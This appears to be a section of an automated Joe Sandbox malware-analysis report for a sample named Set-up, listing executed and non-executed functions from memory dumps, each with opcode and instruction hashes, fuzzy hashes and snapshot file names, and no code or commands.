                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 657b8de8d70e72550047070c1072bec04f1ae74ac9c8da5d2203030cc22d9e91
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5118CA1A243118BC7119B64C885BABFBE6EBC3711F09C16DE8C42F298C274CC44C3A2
                                                                                                                                                                                                                                                              Function 02226F78 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                                                                                              • Instruction ID: 734ccd52748d81e7cba06a601f6e2e432a50a309aae5ae65da6f21bf25c592bc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57018F77A113138B8724CE9CC4D0AABB3B4FF89794B1A445D95411B370DB329D198260
                                                                                                                                                                                                                                                              Function 022533C8 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 826eb97da17682511683eeb6c52fb375d814f0d0144f204077d5ebce35bdf9cf
                                                                                                                                                                                                                                                              • Instruction ID: f50a347450b2c1ff7418cc68b99d7f19b7597c8b2974e1f91d7cce320bfdf384
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 826eb97da17682511683eeb6c52fb375d814f0d0144f204077d5ebce35bdf9cf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF049756103187BD1119B84AC40D37B7ADF7CE7ACF009328F92456164D332ED11D7A0
                                                                                                                                                                                                                                                              Function 0221E748 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 21e51f148cd6a4beac52a65e31aa4c8185bc161e0cb5515423eb2367843d388a
                                                                                                                                                                                                                                                              • Instruction ID: fe296632a7facd370397ae29ebab83bdee6cf96d5ac862278e5d8e9978194e8e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21e51f148cd6a4beac52a65e31aa4c8185bc161e0cb5515423eb2367843d388a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84F0F474068642DFF719DF189C55A3177F2EF86304F2D4168E642971A5C321B821C704
                                                                                                                                                                                                                                                              Function 02228C04 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b93d5f52058c4a179cdcc56a6b5189a6caff73073d7215fbe25f0c71d3ff7e02
                                                                                                                                                                                                                                                              • Instruction ID: bb2ee810edec8716df10a87f3e5f63cbf1b3e975773dd3c04485dcde0721e6b4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b93d5f52058c4a179cdcc56a6b5189a6caff73073d7215fbe25f0c71d3ff7e02
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E401D67461A310ABD234DF54C9C0B7A73B5E78A310F906628E99457295C731EC05C77A
                                                                                                                                                                                                                                                              Function 0221C02B Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: e54b1023c60f1e4f185ccb4e24e2cd490a64a7ab9b68a6b8ad5b764e6596ef41
                                                                                                                                                                                                                                                              • Instruction ID: 069bad5ad81fa1b285667348b064bc38f1279c6e5112c040f0c5bfa9124d15ea
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e54b1023c60f1e4f185ccb4e24e2cd490a64a7ab9b68a6b8ad5b764e6596ef41
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAF08CE49D42006BEAA476906C82F3F326A9B72B01F044429EC4921285ED6639366A7B
                                                                                                                                                                                                                                                              Function 02210D0B Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                                              • Instruction ID: 5255dd46bdc67d3e769a3a83da2041afb66b6436869c5f9a3782db3f453ff074
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7019634A11109EBCB14DF98C194AADB7F5EB59314F208199E8059B794C731AF81DB80
                                                                                                                                                                                                                                                              Function 0223BDB7 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: eb09bcfba1c5644bda3625c56debfcb8ad223da33ada4a2f1f55b810212580c8
                                                                                                                                                                                                                                                              • Instruction ID: 70d62bd2bd5dfd6a1ba03d9c0ea2efaf3718ca55c9a94dbf9a581dc9cab62e9e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb09bcfba1c5644bda3625c56debfcb8ad223da33ada4a2f1f55b810212580c8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDD05E84228B5F878B1B0ED914E0231AA660E0720DB0854BEE5C3AB486C66BC4469218
                                                                                                                                                                                                                                                              Function 022323F8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                              • Instruction ID: 36432006c48793eb4f4d5a4052a9993e202ed399fc07c3533ef4e7f4e7faabca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44D097B05083B20E57098D3400A043BFBF4EA43022B08119EE9C2F3008D320EC024368
                                                                                                                                                                                                                                                              Function 022286EB Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d0d419fc7827e284debaab192e0aa29d8e407d8b73cf7e979b9531c6ae6ff008
                                                                                                                                                                                                                                                              • Instruction ID: 491cfdb17aebd270413f9dc8cffdaa96e544330334aa6ffcf9a5484a86fe9053
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0d419fc7827e284debaab192e0aa29d8e407d8b73cf7e979b9531c6ae6ff008
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFB092E1C53550A69A59AB502D068AAB4678D23611F0420B0C80622308AB17D21A88DF

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 07120860 Relevance: 12.0, Strings: 9, Instructions: 727COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                              • API String ID: 0-2378468523
                                                                                                                                                                                                                                                              • Opcode ID: fc3fd062768571a9eca93dab14ea1b20cffcf7fede457b3eafc75af400348efa
                                                                                                                                                                                                                                                              • Instruction ID: 57a84318dfe9a02995cb743193f10131791fdcdf92d67781c8d9b894d675fb77
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc3fd062768571a9eca93dab14ea1b20cffcf7fede457b3eafc75af400348efa
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2328FB17042658FC72A8B39881076BBFA2AFC9310F1485ABD445CF3A1DB31CD62D7A1
                                                                                                                                                                                                                                                              Function 00963FA0 Relevance: .7, Instructions: 724COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903318520.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_960000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: af5f00874c52aabcee1970b1df1c055d723b916807679db6e8da799b1ed01adc
                                                                                                                                                                                                                                                              • Instruction ID: 2e0e39f36bf79d57e3005feef4be82f0b0574c302fa263fb34321b44bb50687e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af5f00874c52aabcee1970b1df1c055d723b916807679db6e8da799b1ed01adc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3625874A002499FCB05CF98C594AAEFBF2FF89310F258559E815AB3A5C735EC81CB90
                                                                                                                                                                                                                                                              Function 07120996 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 859af7512c039a2318d34508d030ccac464fd047174f73c794e8d5e37fa42cbd
                                                                                                                                                                                                                                                              • Instruction ID: e2b5d55cc09803124180d3788d721ce2f9cc02b4fcb13c6e270d7de182f91919
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 859af7512c039a2318d34508d030ccac464fd047174f73c794e8d5e37fa42cbd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE417DB5B10211CFCB39CF258451B2A7BB2AF8D348F194296D8018F2E1D731CD62D7A1
                                                                                                                                                                                                                                                              Function 00964198 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903318520.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_960000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cd6bc1ba82afc7c246ce15095858c06b2f4b05abbad621294733d3ce36b1d885
                                                                                                                                                                                                                                                              • Instruction ID: 5955ca30ccc856b74bf158872f60030bab6a46d99dbadcf0e0f450d4146d7352
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd6bc1ba82afc7c246ce15095858c06b2f4b05abbad621294733d3ce36b1d885
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41413AB4A00505CFCB05CF99C598AAAFBB1FF48310B25856AD515AB364C736FC91CF94
                                                                                                                                                                                                                                                              Function 00962FCF Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903318520.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_960000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2a4de539d4d2a49f5f1581dfba92fe2200eae93dd1aa1017d2fc5fa2917d2f0d
                                                                                                                                                                                                                                                              • Instruction ID: df8bd496d112003242585111cce61f94fa9e08873b59835606a1f88794aec888
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a4de539d4d2a49f5f1581dfba92fe2200eae93dd1aa1017d2fc5fa2917d2f0d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1217C74A092959FCB01DF6CD8909EABFB0FF4A310B158196D444EB352C735ED89CBA1
                                                                                                                                                                                                                                                              Function 00963010 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903318520.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_960000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 450e2c71d8a9832979dc39a4e25b900af3f9377b7c336a9cd0c5b0db1c650e70
                                                                                                                                                                                                                                                              • Instruction ID: 15b30d1e882afff81bb351d4c980d8f30b76795a15d9bdbd8a5ec9852179016f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 450e2c71d8a9832979dc39a4e25b900af3f9377b7c336a9cd0c5b0db1c650e70
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12214DB4A042199FCB04CF5CC5809AEFBB4FF89310B15859AE815EB356C735ED45CBA1
                                                                                                                                                                                                                                                              Function 008ED006 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903138654.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_8ed000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 6c962990d7418447bedbc7b20eeb94dee8242f3d7bc6984b076838ac112c55c5
                                                                                                                                                                                                                                                              • Instruction ID: c949d85ee5b67307dce8917edeb64d473b941e1746a58b84e560c4c521fd7085
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c962990d7418447bedbc7b20eeb94dee8242f3d7bc6984b076838ac112c55c5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F001696100D3C09FD7124B268894652BFB8EF53224F0D84DBE888CF2A3C2699C49C772
                                                                                                                                                                                                                                                              Function 008ED01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1903138654.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_8ed000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 9dc31f5dd800c48d1047685e136061d9f9b615be796450286dab2326283dfd01
                                                                                                                                                                                                                                                              • Instruction ID: f27ed6ed5097d158f94db6bd5d7cd923137f98720ef2510bf97d6788867f8c89
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dc31f5dd800c48d1047685e136061d9f9b615be796450286dab2326283dfd01
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5301F7310087849AE7108A2BC9C4767BFD8FF42324F1CC529ED188E246C279D849C6B1

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 07120148 Relevance: 9.1, Strings: 7, Instructions: 323COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                              • API String ID: 0-1608119003
                                                                                                                                                                                                                                                              • Opcode ID: 6822a5e06e82cb983c45f67bc525f4ed6fe3eae2b1290268b6a4e6a772ef12a9
                                                                                                                                                                                                                                                              • Instruction ID: d94e6f8119d7366b8a6c6d029fa88c311e78ca619051d4083a66c8c3c8c9fddf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6822a5e06e82cb983c45f67bc525f4ed6fe3eae2b1290268b6a4e6a772ef12a9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCA17BB27043658FC72A8B79941066ABFF5AFCA210F1485ABD481CB3D1DB31CD66D3A1
                                                                                                                                                                                                                                                              Function 07120508 Relevance: 5.3, Strings: 4, Instructions: 267COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                                                                                                              • API String ID: 0-3859475322
                                                                                                                                                                                                                                                              • Opcode ID: 511eb9ba8fd47b61872e608be330d9db79922018f5903aaf9f6f524ab8e37edb
                                                                                                                                                                                                                                                              • Instruction ID: 2d8723bc48b77d07387027c5f8ead676d838b5a2912793e66bfc40d123edee1d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 511eb9ba8fd47b61872e608be330d9db79922018f5903aaf9f6f524ab8e37edb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F8189B17043658FC72A9B6988107767FA6AFCA310F1481AAD581DF2D1DB71CCA3C7A1
                                                                                                                                                                                                                                                              Function 07122428 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1906552651.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7120000_powershell.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                              • API String ID: 0-2125118731
                                                                                                                                                                                                                                                              • Opcode ID: 2f38bf61880fb435ef5f14aa15cec6f28c4b3b21c9c3958578de3c8735172635
                                                                                                                                                                                                                                                              • Instruction ID: 36dd1d533496c0da13b27411b065ee48c074d73cbb6fd59df41ffb6067cd7d31
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f38bf61880fb435ef5f14aa15cec6f28c4b3b21c9c3958578de3c8735172635
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F2188B17003669BDB38592A8C00B2BAAD6BBC4714F25842AE805CF3C5DF3AC852D361